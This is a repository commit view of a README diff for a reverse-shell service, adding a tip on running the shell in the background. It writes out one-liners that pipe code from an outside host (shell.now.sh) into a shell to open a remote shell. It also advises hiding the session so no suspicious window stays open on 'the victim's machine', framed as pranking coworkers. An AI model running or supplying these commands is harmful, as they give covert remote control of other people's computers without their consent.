Browse Source

Add background process tip (#20)

greenkeeper/ava-1.3.0
Luke Childs 6 years ago
committed by GitHub
parent
commit
2500b20b1f
No known key found for this signature in database GPG Key ID: 4AEE18F83AFDEB23
  1. 12
      README.md

12
README.md

@ -67,6 +67,18 @@ while true; do curl https://shell.now.sh/yourip:1337 | sh; done
Be careful if you do this to a coworker, if they leave the office with this still running you're opening them up to attack.
### Running as a background process
The terminal session needs to be kept open to persist the reverse shell connection. That might be a bit of a giveaway if you're trying to prank coworkers.
The following command will run the reverse shell in a background process and exit the terminal, leaving no suspicious looking terminal windows open on the victim's machine.
Make sure you run this in a fresh terminal window otherwise you'll lose any work in your existing session.
```shell
sh -c "curl https://shell.now.sh/localhost:1337 | sh -i &" && exit
```
## License
MIT © Luke Childs

Loading…
Cancel
Save